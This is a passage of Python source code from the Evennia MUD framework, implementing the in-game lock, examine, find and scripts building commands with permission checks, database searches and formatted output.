access_type:[NOT] func1(args)[ AND|OR][ NOT] func2(args) ...]
Where func1, func2, ... are valid lockfuncs with or without arguments.
The separator expressions (AND, OR, NOT) need not be capitalized.
For example:
'get: id(25) or perm(Admin)'
The 'get' lock access_type is checked e.g. by the 'get' command.
An object locked with this example lock will only be possible to pick up
by Admins or by an object with id=25.
You can add several access_types after one another by separating
them by ';', i.e:
'get:id(25); delete:perm(Builder)'
"""
key = "@lock"
aliases = ["@locks"]
locks = "cmd: perm(locks) or perm(Builder)"
help_category = "Building"
def func(self):
"""Sets up the command"""
caller = self.caller
if not self.args:
string = (
"Usage: lock <object>[ = <lockstring>] or lock[/switch] " "<object>/<access_type>"
)
caller.msg(string)
return
if "/" in self.lhs:
# call of the form lock obj/access_type
objname, access_type = [p.strip() for p in self.lhs.split("/", 1)]
obj = None
if objname.startswith("*"):
obj = caller.search_account(objname.lstrip("*"))
if not obj:
obj = caller.search(objname)
if not obj:
return
has_control_access = obj.access(caller, "control")
if access_type == "control" and not has_control_access:
# only allow to change 'control' access if you have 'control' access already
caller.msg("You need 'control' access to change this type of lock.")
return
if not (has_control_access or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
lockdef = obj.locks.get(access_type)
if lockdef:
if "del" in self.switches:
obj.locks.delete(access_type)
string = "deleted lock %s" % lockdef
else:
string = lockdef
else:
string = "%s has no lock of access type '%s'." % (obj, access_type)
caller.msg(string)
return
if self.rhs:
# we have a = separator, so we are assigning a new lock
if self.switches:
swi = ", ".join(self.switches)
caller.msg(
"Switch(es) |w%s|n can not be used with a "
"lock assignment. Use e.g. "
"|wlock/del objname/locktype|n instead." % swi
)
return
objname, lockdef = self.lhs, self.rhs
obj = None
if objname.startswith("*"):
obj = caller.search_account(objname.lstrip("*"))
if not obj:
obj = caller.search(objname)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
ok = False
lockdef = re.sub(r"\'|\"", "", lockdef)
try:
ok = obj.locks.add(lockdef)
except LockException as e:
caller.msg(str(e))
if "cmd" in lockdef.lower() and inherits_from(
obj, "evennia.objects.objects.DefaultExit"
):
# special fix to update Exits since "cmd"-type locks won't
# update on them unless their cmdsets are rebuilt.
obj.at_init()
if ok:
caller.msg("Added lock '%s' to %s." % (lockdef, obj))
return
# if we get here, we are just viewing all locks on obj
obj = None
if self.lhs.startswith("*"):
obj = caller.search_account(self.lhs.lstrip("*"))
if not obj:
obj = caller.search(self.lhs)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
caller.msg("\n".join(obj.locks.all()))
class CmdExamine(ObjManipCommand):
"""
get detailed information about an object
Usage:
examine [<object>[/attrname]]
examine [*<account>[/attrname]]
Switch:
account - examine an Account (same as adding *)
object - examine an Object (useful when OOC)
script - examine a Script
channel - examine a Channel
The examine command shows detailed game info about an
object and optionally a specific attribute on it.
If object is not specified, the current location is examined.
Append a * before the search string to examine an account.
"""
key = "@examine"
aliases = ["@ex", "@exam"]
locks = "cmd:perm(examine) or perm(Builder)"
help_category = "Building"
arg_regex = r"(/\w+?(\s|$))|\s|$"
switch_options = ["account", "object", "script", "channel"]
object_type = "object"
detail_color = "|c"
header_color = "|w"
quell_color = "|r"
separator = "-"
def msg(self, text):
"""
Central point for sending messages to the caller. This tags
the message as 'examine' for eventual custom markup in the client.
Args:
text (str): The text to send.
"""
self.caller.msg(text=(text, {"type": "examine"}))
def format_key(self, obj):
return f"{obj.name} ({obj.dbref})"
def format_aliases(self, obj):
if hasattr(obj, "aliases") and obj.aliases.all():
return ", ".join(utils.make_iter(str(obj.aliases)))
def format_typeclass(self, obj):
if hasattr(obj, "typeclass_path"):
return f"{obj.typename} ({obj.typeclass_path})"
def format_sessions(self, obj):
if hasattr(obj, "sessions"):
sessions = obj.sessions.all()
if sessions:
return ", ".join(f"#{sess.sessid}" for sess in obj.sessions.all())
def format_email(self, obj):
if hasattr(obj, "email") and obj.email:
return f"{self.detail_color}{obj.email}|n"
def format_account_key(self, account):
return f"{self.detail_color}{account.name}|n ({account.dbref})"
def format_account_typeclass(self, account):
return f"{account.typename} ({account.typeclass_path})"
def format_account_permissions(self, account):
perms = account.permissions.all()
if account.is_superuser:
perms = ["<Superuser>"]
elif not perms:
perms = ["<None>"]
perms = ", ".join(perms)
if account.attributes.has("_quell"):
perms += f" {self.quell_color}(quelled)|n"
return perms
def format_location(self, obj):
if hasattr(obj, "location") and obj.location:
return f"{obj.location.key} (#{obj.location.id})"
def format_home(self, obj):
if hasattr(obj, "home") and obj.home:
return f"{obj.home.key} (#{obj.home.id})"
def format_destination(self, obj):
if hasattr(obj, "destination") and obj.destination:
return f"{obj.destination.key} (#{obj.destination.id})"
def format_permissions(self, obj):
perms = obj.permissions.all()
if perms:
perms_string = ", ".join(perms)
if obj.is_superuser:
perms_string += " <Superuser>"
return perms_string
def format_locks(self, obj):
locks = str(obj.locks)
if locks:
return utils.fill(
"; ".join([lock for lock in locks.split(";")]), indent=2
)
return "Default"
def format_scripts(self, obj):
if hasattr(obj, "scripts") and hasattr(obj.scripts, "all") and obj.scripts.all():
return f"{obj.scripts}"
def format_single_tag(self, tag):
if tag.db_category:
return f"{tag.db_key}[{tag.db_category}]"
else:
return f"{tag.db_key}"
def format_tags(self, obj):
if hasattr(obj, "tags"):
tags = sorted(obj.tags.all(return_objs=True))
if tags:
formatted_tags = [self.format_single_tag(tag) for tag in tags]
return utils.fill(", ".join(formatted_tags), indent=2)
def format_single_cmdset_options(self, cmdset):
def _truefalse(string, value):
if value is None:
return ""
if value:
return f"{string}: T"
return f"{string}: F"
return ", ".join(
_truefalse(opt, getattr(cmdset, opt))
for opt in ("no_exits", "no_objs", "no_channels", "duplicates")
if getattr(cmdset, opt) is not None
)
def format_single_cmdset(self, cmdset):
options = self.format_single_cmdset_options(cmdset)
options = f", {options}" if options else ""
return f"{cmdset.path} [{cmdset.key}] ({cmdset.mergetype}, prio {cmdset.priority}{options})"
def format_stored_cmdsets(self, obj):
if hasattr(obj, "cmdset"):
stored_cmdset_strings = []
stored_cmdsets = sorted(obj.cmdset.all(), key=lambda x: x.priority, reverse=True)
for cmdset in stored_cmdsets:
if cmdset.key != "_EMPTY_CMDSET":
stored_cmdset_strings.append(self.format_single_cmdset(cmdset))
return "\n " + "\n ".join(stored_cmdset_strings)
def format_merged_cmdsets(self, obj, current_cmdset):
if not hasattr(obj, "cmdset"):
return None
all_cmdsets = [(cmdset.key, cmdset) for cmdset in current_cmdset.merged_from]
# we always at least try to add account- and session sets since these are ignored
# if we merge on the object level.
if hasattr(obj, "account") and obj.account:
# get Attribute-cmdsets if they exist
all_cmdsets.extend([(cmdset.key, cmdset) for cmdset in obj.account.cmdset.all()])
if obj.sessions.count():
# if there are more sessions than one on objects it's because of multisession mode
# we only show the first session's cmdset here (it is -in principle- possible
# that different sessions have different cmdsets but for admins who want such
# madness it is better that they overload with their own CmdExamine to handle it).
all_cmdsets.extend([(cmdset.key, cmdset)
for cmdset in obj.account.sessions.all()[0].cmdset.all()])
else:
try:
# we have to protect this since many objects don't have sessions.
all_cmdsets.extend([(cmdset.key, cmdset)
for cmdset in obj.get_session(obj.sessions.get()).cmdset.all()])
except (TypeError, AttributeError):
# an error means we are merging an object without a session
pass
all_cmdsets = [cmdset for cmdset in dict(all_cmdsets).values()]
all_cmdsets.sort(key=lambda x: x.priority, reverse=True)
merged_cmdset_strings = []
for cmdset in all_cmdsets:
if cmdset.key != "_EMPTY_CMDSET":
merged_cmdset_strings.append(self.format_single_cmdset(cmdset))
return "\n " + "\n ".join(merged_cmdset_strings)
def format_current_cmds(self, obj, current_cmdset):
current_commands = sorted([cmd.key for cmd in current_cmdset if cmd.access(obj, "cmd")])
return "\n" + utils.fill(", ".join(current_commands), indent=2)
def _get_attribute_value_type(self, attrvalue):
typ = ""
if not isinstance(attrvalue, str):
try:
name = attrvalue.__class__.__name__
except AttributeError:
try:
name = attrvalue.__name__
except AttributeError:
name = attrvalue
if str(name).startswith("_Saver"):
try:
typ = str(type(deserialize(attrvalue)))
except Exception:
# fall back to the raw value's type if deserialization fails
typ = str(type(attrvalue))
else:
typ = str(type(attrvalue))
return typ
def format_single_attribute_detail(self, obj, attr):
global _FUNCPARSER
if not _FUNCPARSER:
_FUNCPARSER = funcparser.FuncParser(settings.FUNCPARSER_OUTGOING_MESSAGES_MODULES)
key, category, value = attr.db_key, attr.db_category, attr.value
typ = self._get_attribute_value_type(value)
typ = f" |B[type: {typ}]|n" if typ else ""
value = utils.to_str(value)
value = _FUNCPARSER.parse(ansi_raw(value), escape=True)
return (f"Attribute {obj.name}/{self.header_color}{key}|n "
f"[category={category}]{typ}:\n\n{value}")
def format_single_attribute(self, attr):
global _FUNCPARSER
if not _FUNCPARSER:
_FUNCPARSER = funcparser.FuncParser(settings.FUNCPARSER_OUTGOING_MESSAGES_MODULES)
key, category, value = attr.db_key, attr.db_category, attr.value
typ = self._get_attribute_value_type(value)
typ = f" |B[type: {typ}]|n" if typ else ""
value = utils.to_str(value)
value = _FUNCPARSER.parse(ansi_raw(value), escape=True)
value = utils.crop(value)
if category:
return f"{self.header_color}{key}|n[{category}]={value}{typ}"
else:
return f"{self.header_color}{key}|n={value}{typ}"
def format_attributes(self, obj):
output = "\n " + "\n ".join(
sorted(self.format_single_attribute(attr)
for attr in obj.db_attributes.all())
)
if output.strip():
# we don't want just an empty line
return output
def format_nattributes(self, obj):
try:
ndb_attr = obj.nattributes.all(return_tuples=True)
except Exception:
return
if ndb_attr and ndb_attr[0]:
return "\n " + " \n".join(
sorted(self.format_single_attribute(attr)
for attr, value in ndb_attr)
)
def format_exits(self, obj):
if hasattr(obj, "exits"):
exits = ", ".join(f"{exit.name}({exit.dbref})" for exit in obj.exits)
return exits if exits else None
def format_chars(self, obj):
if hasattr(obj, "contents"):
chars = ", ".join(f"{obj.name}({obj.dbref})" for obj in obj.contents
if obj.account)
return chars if chars else None
def format_things(self, obj):
if hasattr(obj, "contents"):
things = ", ".join(f"{obj.name}({obj.dbref})" for obj in obj.contents
if not obj.account and not obj.destination)
return things if things else None
def format_script_desc(self, obj):
if hasattr(obj, "db_desc") and obj.db_desc:
return crop(obj.db_desc, 20)
def format_script_is_persistent(self, obj):
if hasattr(obj, "db_persistent"):
return "T" if obj.db_persistent else "F"
def format_script_timer_data(self, obj):
if hasattr(obj, "db_interval") and obj.db_interval > 0:
start_delay = "T" if obj.db_start_delay else "F"
next_repeat = obj.time_until_next_repeat()
active = "|grunning|n" if obj.db_is_active and next_repeat else "|rinactive|n"
interval = obj.db_interval
next_repeat = "N/A" if next_repeat is None else f"{next_repeat}s"
repeats = ""
if obj.db_repeats:
remaining_repeats = obj.remaining_repeats()
remaining_repeats = 0 if remaining_repeats is None else remaining_repeats
repeats = f" - {remaining_repeats}/{obj.db_repeats} remain"
return (f"{active} - interval: {interval}s "
f"(next: {next_repeat}{repeats}, start_delay: {start_delay})")
def format_channel_sub_totals(self, obj):
if hasattr(obj, "db_account_subscriptions"):
account_subs = obj.db_account_subscriptions.all()
object_subs = obj.db_object_subscriptions.all()
online = len(obj.subscriptions.online())
ntotal = account_subs.count() + object_subs.count()
return f"{ntotal} ({online} online)"
def format_channel_account_subs(self, obj):
if hasattr(obj, "db_account_subscriptions"):
account_subs = obj.db_account_subscriptions.all()
if account_subs:
return "\n " + "\n ".join(
format_grid([sub.key for sub in account_subs], sep=' ', width=_DEFAULT_WIDTH))
def format_channel_object_subs(self, obj):
if hasattr(obj, "db_object_subscriptions"):
object_subs = obj.db_object_subscriptions.all()
if object_subs:
return "\n " + "\n ".join(
format_grid([sub.key for sub in object_subs], sep=' ', width=_DEFAULT_WIDTH))
def get_formatted_obj_data(self, obj, current_cmdset):
"""
Calls all other `format_*` methods.
"""
objdata = {}
objdata["Name/key"] = self.format_key(obj)
objdata["Aliases"] = self.format_aliases(obj)
objdata["Typeclass"] = self.format_typeclass(obj)
objdata["Sessions"] = self.format_sessions(obj)
objdata["Email"] = self.format_email(obj)
if hasattr(obj, "has_account") and obj.has_account:
objdata["Account"] = self.format_account_key(obj.account)
objdata[" Account Typeclass"] = self.format_account_typeclass(obj.account)
objdata[" Account Permissions"] = self.format_account_permissions(obj.account)
objdata["Location"] = self.format_location(obj)
objdata["Home"] = self.format_home(obj)
objdata["Destination"] = self.format_destination(obj)
objdata["Permissions"] = self.format_permissions(obj)
objdata["Locks"] = self.format_locks(obj)
if (current_cmdset
and not (len(obj.cmdset.all()) == 1
and obj.cmdset.current.key == "_EMPTY_CMDSET")):
objdata["Stored Cmdset(s)"] = self.format_stored_cmdsets(obj)
objdata["Merged Cmdset(s)"] = self.format_merged_cmdsets(obj, current_cmdset)
objdata[f"Commands vailable to {obj.key} (result of Merged Cmdset(s))"] = (
self.format_current_cmds(obj, current_cmdset))
if self.object_type == "script":
objdata["Description"] = self.format_script_desc(obj)
objdata["Persistent"] = self.format_script_is_persistent(obj)
objdata["Script Repeat"] = self.format_script_timer_data(obj)
objdata["Scripts"] = self.format_scripts(obj)
objdata["Tags"] = self.format_tags(obj)
objdata["Persistent Attributes"] = self.format_attributes(obj)
objdata["Non-Persistent Attributes"] = self.format_nattributes(obj)
objdata["Exits"] = self.format_exits(obj)
objdata["Characters"] = self.format_chars(obj)
objdata["Content"] = self.format_things(obj)
if self.object_type == "channel":
objdata["Subscription Totals"] = self.format_channel_sub_totals(obj)
objdata["Account Subscriptions"] = self.format_channel_account_subs(obj)
objdata["Object Subscriptions"] = self.format_channel_object_subs(obj)
return objdata
def format_output(self, obj, current_cmdset):
"""
Formats the full examine page return.
"""
objdata = self.get_formatted_obj_data(obj, current_cmdset)
# format output
main_str = []
max_width = -1
for header, block in objdata.items():
if block is not None:
blockstr = f"{self.header_color}{header}|n: {block}"
max_width = max(max_width, max(display_len(line) for line in blockstr.split("\n")))
main_str.append(blockstr)
main_str = "\n".join(main_str)
max_width = max(0, min(self.client_width(), max_width))
sep = self.separator * max_width
return f"{sep}\n{main_str}\n{sep}"
def _search_by_object_type(self, obj_name, objtype):
"""
Route to different search functions depending on the object type being
examined. This also handles error reporting for multimatches/no matches.
Args:
obj_name (str): The search query.
objtype (str): One of 'object', 'account', 'script' or 'channel'.
Returns:
any: `None` if no match or multimatch, otherwise a single result.
"""
obj = None
if objtype == "object":
obj = self.caller.search(obj_name)
elif objtype == "account":
try:
obj = self.caller.search_account(obj_name.lstrip("*"))
except AttributeError:
# this means we are calling examine from an account object
obj = self.caller.search(
obj_name.lstrip("*"), search_object="object" in self.switches
)
else:
obj = getattr(search, f"search_{objtype}")(obj_name)
if not obj:
self.caller.msg(f"No {objtype} found with key {obj_name}.")
obj = None
elif len(obj) > 1:
err = "Multiple {objtype} found with key {obj_name}:\n{matches}"
self.caller.msg(err.format(
objtype=objtype,
obj_name=obj_name,
matches=", ".join(f"{ob.key}(#{ob.id})" for ob in obj)
))
obj = None
else:
obj = obj[0]
return obj
def parse(self):
super().parse()
self.examine_objs = []
if not self.args:
# If no arguments are provided, examine the invoker's location.
if hasattr(self.caller, "location"):
self.examine_objs.append((self.caller.location, None))
else:
self.msg("You need to supply a target to examine.")
raise InterruptCommand
else:
for objdef in self.lhs_objattr:
# note that we check the objtype for every repeat; this will always
# be the same result, but it makes for a cleaner code and multi-examine
# is not so common anyway.
obj = None
obj_name = objdef["name"] # name
obj_attrs = objdef["attrs"] # /attrs
# identify object type, in prio account - script - channel
object_type = "object"
if (utils.inherits_from(self.caller, "evennia.accounts.accounts.DefaultAccount")
or "account" in self.switches or obj_name.startswith("*")):
object_type = "account"
elif "script" in self.switches:
object_type = "script"
elif "channel" in self.switches:
object_type = "channel"
self.object_type = object_type
obj = self._search_by_object_type(obj_name, object_type)
if obj:
self.examine_objs.append((obj, obj_attrs))
def func(self):
"""Process command"""
for obj, obj_attrs in self.examine_objs:
# these are parsed out in .parse already
if not obj.access(self.caller, "examine"):
# If we don't have special info access, just look
# at the object instead.
self.msg(self.caller.at_look(obj))
continue
if obj_attrs:
# we are only interested in specific attributes
attrs = [attr for attr in obj.db_attributes.all() if attr.db_key in obj_attrs]
if not attrs:
self.msg("No attributes found on {obj.name}.")
else:
out_strings = []
for attr in attrs:
out_strings.append(self.format_single_attribute_detail(obj, attr))
out_str = "\n".join(out_strings)
max_width = max(display_len(line) for line in out_strings)
max_width = max(0, min(max_width, self.client_width()))
sep = self.separator * max_width
self.msg(f"{sep}\n{out_str}")
return
# examine the obj itself
if self.object_type in ("object", "account"):
# for objects and accounts we need to set up an asynchronous
# fetch of the cmdset and not proceed with the examine display
# until the fetch is complete
session = None
if obj.sessions.count():
mergemode = "session"
session = obj.sessions.get()[0]
elif self.object_type == "account":
mergemode = "account"
else:
mergemode = "object"
account = None
objct = None
if self.object_type == "account":
account = obj
else:
account = obj.account
objct = obj
# this is usually handled when a command runs, but when we examine
# we may have leftover inherited cmdsets directly after a move etc.
obj.cmdset.update()
# using callback to print results whenever function returns.
def _get_cmdset_callback(current_cmdset):
self.msg(self.format_output(obj, current_cmdset).strip())
get_and_merge_cmdsets(
obj, session, account, objct, mergemode, self.raw_string
).addCallback(_get_cmdset_callback)
else:
# for objects without cmdsets we can proceed to examine immediately
self.msg(self.format_output(obj, None).strip())
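# Illustrative sketch, not part of the original module: the framing logic of
# CmdExamine.format_output above, isolated as a pure function. Plain len() stands
# in for display_len and the fixed client width is an assumption for the example.
def _example_frame_blocks(blocks, client_width=78, sep_char="-"):
    """Frame the non-empty header blocks between separator lines sized to the content."""
    body = "\n".join(block for block in blocks if block is not None)
    max_width = max((len(line) for line in body.split("\n")), default=0)
    max_width = max(0, min(client_width, max_width))
    sep = sep_char * max_width
    return f"{sep}\n{body}\n{sep}"

# _example_frame_blocks(["Name/key: Limbo (#2)", None, "Typeclass: Room (...)"])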
class CmdFind(COMMAND_DEFAULT_CLASS):
"""
search the database for objects
Usage:
find[/switches] <name or dbref or *account> [= dbrefmin[-dbrefmax]]
locate - this is a shorthand for using the /loc switch.
Switches:
room - only look for rooms (location=None)
exit - only look for exits (destination!=None)
char - only look for characters (BASE_CHARACTER_TYPECLASS)
exact - only exact matches are returned.
loc - display object location if exists and match has one result
startswith - search for names starting with the string, rather than containing
Searches the database for an object of a particular name or exact #dbref.
Use *accountname to search for an account. The switches allows for
limiting object matches to certain game entities. Dbrefmin and dbrefmax
limits matches to within the given dbrefs range, or above/below if only
one is given.
"""
key = "@find"
aliases = ["@search", "@locate"]
switch_options = ("room", "exit", "char", "exact", "loc", "startswith")
locks = "cmd:perm(find) or perm(Builder)"
help_category = "Building"
def func(self):
"""Search functionality"""
caller = self.caller
switches = self.switches
if not self.args or (not self.lhs and not self.rhs):
caller.msg("Usage: find <string> [= low [-high]]")
return
if "locate" in self.cmdstring: # Use option /loc as a default for locate command alias
switches.append("loc")
searchstring = self.lhs
try:
# Try grabbing the actual min/max id values by database aggregation
qs = ObjectDB.objects.values("id").aggregate(low=Min("id"), high=Max("id"))
low, high = sorted(qs.values())
if not (low and high):
raise ValueError(
f"{self.__class__.__name__}: Min and max ID not returned by aggregation; falling back to queryset slicing."
)
except Exception as e:
logger.log_trace(e)
# If that doesn't work for some reason (empty DB?), guess the lower
# bound and do a less-efficient query to find the upper.
low, high = 1, ObjectDB.objects.all().order_by("-id").first().id
if self.rhs:
try:
# Check that rhs is either a valid dbref or dbref range
bounds = tuple(
sorted(dbref(x, False) for x in re.split(r"[-\s]+", self.rhs.strip()))
)
# dbref() will return either a valid int or None
assert bounds
# None should not exist in the bounds list
assert None not in bounds
low = bounds[0]
if len(bounds) > 1:
high = bounds[-1]
except AssertionError:
caller.msg("Invalid dbref range provided (not a number).")
return
except IndexError as e:
logger.log_err(
f"{self.__class__.__name__}: Error parsing upper and lower bounds of query."
)
logger.log_trace(e)
# evaluate both bounds before assigning so a reversed range is swapped correctly
low, high = min(low, high), max(low, high)
is_dbref = utils.dbref(searchstring)
is_account = searchstring.startswith("*")
restrictions = ""
if self.switches:
restrictions = ", %s" % (", ".join(self.switches))
if is_dbref or is_account:
if is_dbref:
# a dbref search
result = caller.search(searchstring, global_search=True, quiet=True)
string = "|wExact dbref match|n(#%i-#%i%s):" % (low, high, restrictions)
else:
# an account search
searchstring = searchstring.lstrip("*")
result = caller.search_account(searchstring, quiet=True)
string = "|wMatch|n(#%i-#%i%s):" % (low, high, restrictions)
if "room" in switches:
result = result if inherits_from(result, ROOM_TYPECLASS) else None
if "exit" in switches:
result = result if inherits_from(result, EXIT_TYPECLASS) else None
if "char" in switches:
result = result if inherits_from(result, CHAR_TYPECLASS) else None
if not result:
string += "\n |RNo match found.|n"
elif not low <= int(result[0].id) <= high:
string += "\n |RNo match found for '%s' in #dbref interval.|n" % searchstring
else:
result = result[0]
string += "\n|g %s - %s|n" % (result.get_display_name(caller), result.path)
if "loc" in self.switches and not is_account and result.location:
string += " (|wlocation|n: |g{}|n)".format(
result.location.get_display_name(caller)
)
else:
# Not an account/dbref search but a wider search; build a queryset.
# Searches for key and aliases
if "exact" in switches:
keyquery = Q(db_key__iexact=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__iexact=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
elif "startswith" in switches:
keyquery = Q(db_key__istartswith=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__istartswith=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
else:
keyquery = Q(db_key__icontains=searchstring, id__gte=low, id__lte=high)
aliasquery = Q(
db_tags__db_key__icontains=searchstring,
db_tags__db_tagtype__iexact="alias",
id__gte=low,
id__lte=high,
)
# Keep the initial queryset handy for later reuse
result_qs = ObjectDB.objects.filter(keyquery | aliasquery).distinct()
nresults = result_qs.count()
# Use iterator to minimize memory ballooning on large result sets
results = result_qs.iterator()
# Check and see if type filtering was requested; skip it if not
if any(x in switches for x in ("room", "exit", "char")):
obj_ids = set()
for obj in results:
if (
("room" in switches and inherits_from(obj, ROOM_TYPECLASS))
or ("exit" in switches and inherits_from(obj, EXIT_TYPECLASS))
or ("char" in switches and inherits_from(obj, CHAR_TYPECLASS))
):
obj_ids.add(obj.id)
# Filter previous queryset instead of requesting another
filtered_qs = result_qs.filter(id__in=obj_ids).distinct()
nresults = filtered_qs.count()
# Use iterator again to minimize memory ballooning
results = filtered_qs.iterator()
# still results after type filtering?
if nresults:
if nresults > 1:
header = f"{nresults} Matches"
else:
header = "One Match"
string = f"|w{header}|n(#{low}-#{high}{restrictions}):"
res = None
for res in results:
string += f"\n |g{res.get_display_name(caller)} - {res.path}|n"
if (
"loc" in self.switches
and nresults == 1
and res
and getattr(res, "location", None)
):
string += f" (|wlocation|n: |g{res.location.get_display_name(caller)}|n)"
else:
string = f"|wNo Matches|n(#{low}-#{high}{restrictions}):"
string += f"\n |RNo matches found for '{searchstring}'|n"
# send result
caller.msg(string.strip())
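# Illustrative sketch, not part of the original module: the "low[-high]" dbref
# range parsing done in CmdFind.func above, with plain int() standing in for
# evennia's dbref() helper (an assumption to keep the sketch standalone).
def _example_parse_dbref_range(text, default_low=1, default_high=999999):
    """Return (low, high) bounds from strings like '5', '5-100' or '5 100'."""
    low, high = default_low, default_high
    if text:
        bounds = sorted(int(part) for part in re.split(r"[-\s]+", text.strip()))
        low = bounds[0]
        if len(bounds) > 1:
            high = bounds[-1]
    return min(low, high), max(low, high)

# _example_parse_dbref_range("100-5") -> (5, 100)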
class ScriptEvMore(EvMore):
"""
Listing 1000+ Scripts can be very slow and memory-consuming. So
we use this custom EvMore child to build an EvTable only for
each page of the list.
"""
def init_pages(self, scripts):
"""Prepare the script list pagination"""
script_pages = Paginator(scripts, max(1, int(self.height / 2)))
super().init_pages(script_pages)
def page_formatter(self, scripts):
"""Takes a page of scripts and formats the output
into an EvTable."""
if not scripts:
return "<No scripts>"
table = EvTable(
"|wdbref|n",
"|wobj|n",
"|wkey|n",
"|wintval|n",
"|wnext|n",
"|wrept|n",
"|wtypeclass|n",
"|wdesc|n",
align="r",
border="tablecols",
width=self.width,
)
for script in scripts:
nextrep = script.time_until_next_repeat()
if nextrep is None:
nextrep = script.db._paused_time
nextrep = f"PAUSED {int(nextrep)}s" if nextrep else "--"
else:
nextrep = f"{nextrep}s"
maxrepeat = script.repeats
remaining = script.remaining_repeats() or 0
if maxrepeat:
rept = "%i/%i" % (maxrepeat - remaining, maxrepeat)
else:
rept = "-/-"
table.add_row(
f"#{script.id}",
f"{script.obj.key}({script.obj.dbref})"
if (hasattr(script, "obj") and script.obj)
else "<Global>",
script.key,
script.interval if script.interval > 0 else "--",
nextrep,
rept,
script.typeclass_path.rsplit(".", 1)[-1],
crop(script.desc, width=20),
)
return str(table)
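# Illustrative sketch, not part of the original module: the 'next' and 'rept'
# column strings built in ScriptEvMore.page_formatter above, extracted as pure
# helpers that take plain values instead of Script objects.
def _example_format_next_repeat(next_repeat, paused_time=None):
    """Mirror the 'next' column: countdown in seconds, paused marker, or '--'."""
    if next_repeat is None:
        return f"PAUSED {int(paused_time)}s" if paused_time else "--"
    return f"{next_repeat}s"

def _example_format_repeats(max_repeat, remaining):
    """Mirror the 'rept' column: 'done/total' or '-/-' for endlessly repeating scripts."""
    remaining = remaining or 0
    return f"{max_repeat - remaining}/{max_repeat}" if max_repeat else "-/-"

# _example_format_next_repeat(12)        -> "12s"
# _example_format_next_repeat(None, 4.2) -> "PAUSED 4s"
# _example_format_repeats(10, 3)         -> "7/10"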
class CmdScripts(COMMAND_DEFAULT_CLASS):
"""
List and manage all running scripts. Allows for creating new global
scripts.
Usage:
script[/switches] [script-#dbref, key, script.path or <obj>]
script[/start||stop] <obj> = <script.path or script-key>
Switches:
start - start/unpause an existing script's timer.
stop - stops an existing script's timer
pause - pause a script's timer
delete - deletes script. This will also stop the timer as needed
Examples:
script - list scripts
script myobj - list all scripts on object
script foo.bar.Script - create a new global Script
script scriptname - examine named existing global script
script myobj = foo.bar.Script - create and assign script to object
script/stop myobj = scriptname - stop script on object
script/pause foo.Bar.Script - pause global script
script/delete myobj - delete ALL scripts on object
script/delete #dbref[-#dbref] - delete script or range by dbref
When given with an `<obj>` as left-hand-side, this creates and
assigns a new script to that object. Without an `<obj>`, this
manages and inspects global scripts.
If no switches are given, this command just views all active
scripts. The argument can be either an object, at which point it
will be searched for all scripts defined on it, or a script name
or #dbref. For using the /stop switch, a unique script #dbref is
required since whole classes of scripts often have the same name.
Use the `script` build-level command for managing scripts attached to
objects.
"""
key = "@scripts"
aliases = ["@script"]
switch_options = ("create", "start", "stop", "pause", "delete")
locks = "cmd:perm(scripts) or perm(Builder)"
help_category = "System"
excluded_typeclass_paths = ["evennia.prototypes.prototypes.DbPrototype"]
switch_mapping = {
"create": "|gCreated|n",
"start": "|gStarted|n",
"stop": "|RStopped|n",
"pause": "|Paused|n",
"delete": "|rDeleted|n"
}
def _search_script(self, args):
# test first if this is a script match
scripts = ScriptDB.objects.get_all_scripts(key=args)
if scripts:
return scripts
# try typeclass path
scripts = ScriptDB.objects.filter(db_typeclass_path__iendswith=args)
if scripts:
return scripts
if "-" in args:
# may be a dbref-range
val1, val2 = (dbref(part.strip()) for part in args.split('-', 1))
if val1 and val2:
scripts = ScriptDB.objects.filter(id__in=(range(val1, val2 + 1)))
if scripts:
return scripts
def func(self):
"""implement method"""
caller = self.caller
if not self.args:
# show all scripts
scripts = ScriptDB.objects.all()
if not scripts:
caller.msg("No scripts found.")
return
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
return
# find script or object to operate on
scripts, obj = None, None
if self.rhs:
obj_query = self.lhs
script_query = self.rhs
else:
obj_query = script_query = self.args
scripts = self._search_script(script_query)
objects = ObjectDB.objects.object_search(obj_query)
obj = objects[0] if objects else None
if not self.switches:
# creation / view mode
if obj:
# we have an object
if self.rhs:
# creation mode
if obj.scripts.add(self.rhs, autostart=True):
caller.msg(
f"Script |w{self.rhs}|n successfully added and "
f"started on {obj.get_display_name(caller)}.")
else:
caller.msg(f"Script {self.rhs} could not be added and/or started "
f"on {obj.get_display_name(caller)} (or it started and "
"immediately shut down).")
else:
# just show all scripts on object
scripts = ScriptDB.objects.filter(db_obj=obj)
if scripts:
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
else:
caller.msg(f"No scripts defined on {obj}")
elif scripts:
# show found script(s)
ScriptEvMore(caller, scripts.order_by("id"), session=self.session)
else:
# create global script
try:
new_script = create.create_script(self.args)
except ImportError:
logger.log_trace()
new_script = None
if new_script:
caller.msg(f"Global Script Created - "
f"{new_script.key} ({new_script.typeclass_path})")
ScriptEvMore(caller, [new_script], session=self.session)
else:
caller.msg(f"Global Script |rNOT|n Created |r(see log)|n - "
f"arguments: {self.args}")
elif scripts or obj:
# modification switches - must operate on existing scripts
if not scripts:
scripts = ScriptDB.objects.filter(db_obj=obj)
if scripts.count() > 1:
ret = yield(f"Multiple scripts found: {scripts}. Are you sure you want to "
"operate on all of them? [Y]/N? ")
if ret.lower() in ('n', 'no'):
caller.msg("Aborted.")
return
for script in scripts:
script_key = script.key
script_typeclass_path = script.typeclass_path
scripttype = f"Script on {obj}" if obj else "Global Script"
for switch in self.switches:
verb = self.switch_mapping[switch]
msgs = []
try:
getattr(script, switch)()
except Exception:
logger.log_trace()
msgs.append(f"{scripttype} |rNOT|n {verb} |r(see log)|n - "
f"{script_key} ({script_typeclass_path})|n")
else:
msgs.append(f"{scripttype} {verb} - "
f"{script_key} ({script_typeclass_path})")
caller.msg("\n".join(msgs))
if "delete" not in self.switches:
ScriptEvMore(caller, [script], session=self.session)
else:
caller.msg("No scripts found.")
class CmdObjects(COMMAND_DEFAULT_CLASS):
"""
